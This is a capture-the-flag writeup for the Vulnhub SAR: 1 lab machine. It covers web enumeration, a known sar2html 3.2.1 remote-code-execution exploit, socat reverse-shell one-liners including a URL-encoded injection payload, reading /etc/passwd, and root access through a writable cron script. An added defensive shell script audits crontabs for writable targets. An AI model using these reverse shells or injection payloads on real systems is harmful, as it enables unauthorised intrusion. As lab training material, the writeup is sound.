Sunday 11 April 2021

Vulnhub Writeup: SAR: 1

Vulnhub - SAR

[Image: SAR login screen]


Sar is an OSCP-Like VM with the intent of gaining experience in the world of penetration testing.

You can download the box from vulnhub here.

Initial Scans

nmap -sn

Server is up on IP

sudo autorecon

Open Ports

Just a single port is open:

80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.29 ((Ubuntu))

80/tcp Apache httpd 2.4.29 ((Ubuntu))

Nikto shows /phpinfo.php exists.

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-large-files.txt -u -o root-raft-lg-files.log

[Image: gobuster files]

gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-big.txt -u -o root-dirlist-big.log -x php,html,txt,bak

robots.txt contains a single entry: sar2HTML


[Image: sar2html page]

The version is shown on the homepage: sar2html Ver 3.2.1. Looks like there is an RCE for it.

searchsploit sar2

Looks like it works!


Checking that the ping callback works on the local kali box:

sudo tcpdump -vv -i eth1 icmp

[Image: ping callback]

The output of the command is shown in the page source. Here I’ve just run cat /etc/passwd. Each line is in a separate <option> tag.


Working reverse shell

socat tcp-connect: exec:/bin/sh,pty,stderr,setsid,sigint,sane

Full URL -;socat%20tcp-connect:,pty,stderr,setsid,sigint,sane

[Image: shell GET]

Full TTY with bash:

socat tcp-connect: exec:'bash -li',pty,stderr,setsid,sigint,sane

Local listener (for the full TTY):

socat file:`tty`,raw,echo=0 tcp-listen:1998
export TERM=xterm-256color

user.txt is readable as www-data.


linpeas shows a cron job that runs every 5 minutes,

[Image: cron job]

which is in /etc/crontab.

The system-wide crontab just calls which is writable by www-data.

I’ll add the reverse shell to it, set up a listener and wait…

[Image: setting up reverse shell]

And it works! The top tab in the image is running pspy64.
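The privilege escalation above comes down to one misconfiguration: a root cron job running a script that a low-privilege user can edit. The following audit script is an added example, not part of the original writeup or of any tool mentioned in it. It reads a crontab in /etc/crontab's system format (minute hour dom month dow user command), pulls the absolute paths out of each command, and reports any that are group- or world-writable. Only absolute paths are inspected (a `cd /dir && ./script` form would need extra handling), and the function names, the temp-directory sample crontab and the two sample scripts are constructed for the demo.

```shell
#!/bin/sh
# Audit helper (added example): list scripts referenced from a system crontab
# that are writable by someone other than their owner.

# Print the unique absolute paths that appear in the command part of each
# active cron line. Comments, blank lines and VAR=value lines are skipped;
# the command starts at field 7 in /etc/crontab format.
cron_targets() {
    crontab_file=$1
    grep -v '^[[:space:]]*#' "$crontab_file" |
    grep -v '^[[:space:]]*$' |
    grep -v '^[A-Za-z_]*=' |
    awk '{ for (i = 7; i <= NF; i++) if ($i ~ /^\//) print $i }' |
    sort -u
}

# For every target that exists as a regular file, print it if the group
# write bit (column 6 of ls -l) or the other write bit (column 9) is set.
# Paths are assumed not to contain whitespace.
writable_cron_targets() {
    for target in $(cron_targets "$1"); do
        [ -f "$target" ] || continue
        mode=$(ls -ld "$target" | cut -c1-10)
        case "$mode" in
            ?????w????|????????w?) echo "$target" ;;
        esac
    done
}

# Demo on a constructed crontab: one world-writable script (the weakness
# abused in the writeup) and one correctly permissioned script.
demo_writable_cron_targets() {
    tmp=$(mktemp -d)
    printf '#!/bin/sh\necho maintenance\n' > "$tmp/maintenance.sh"
    printf '#!/bin/sh\necho backup\n' > "$tmp/backup.sh"
    chmod 777 "$tmp/maintenance.sh"   # misconfigured: anyone can edit it
    chmod 755 "$tmp/backup.sh"        # owner-writable only
    cat > "$tmp/crontab" <<EOF
SHELL=/bin/sh
# m h dom mon dow user command
*/5 * * * * root $tmp/maintenance.sh
0 3 * * * root $tmp/backup.sh >/dev/null 2>&1
EOF
    writable_cron_targets "$tmp/crontab"   # prints only maintenance.sh
    rm -rf "$tmp"
}

demo_writable_cron_targets
```

Against a real host you would call `writable_cron_targets /etc/crontab` and repeat for the files under /etc/cron.d; a non-empty result means a root-scheduled script is editable by other users and should have its ownership and mode corrected.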


Seems like a fairly straightforward machine. I learned about the socat reverse shell because there is no netcat -e or python binary (python3 is there, so I could have used that). socat is also a nice backup to python for upgrading to a full TTY with password entry support for sudo. I also learned that /etc/crontab is the system-wide crontab and a must-check file!

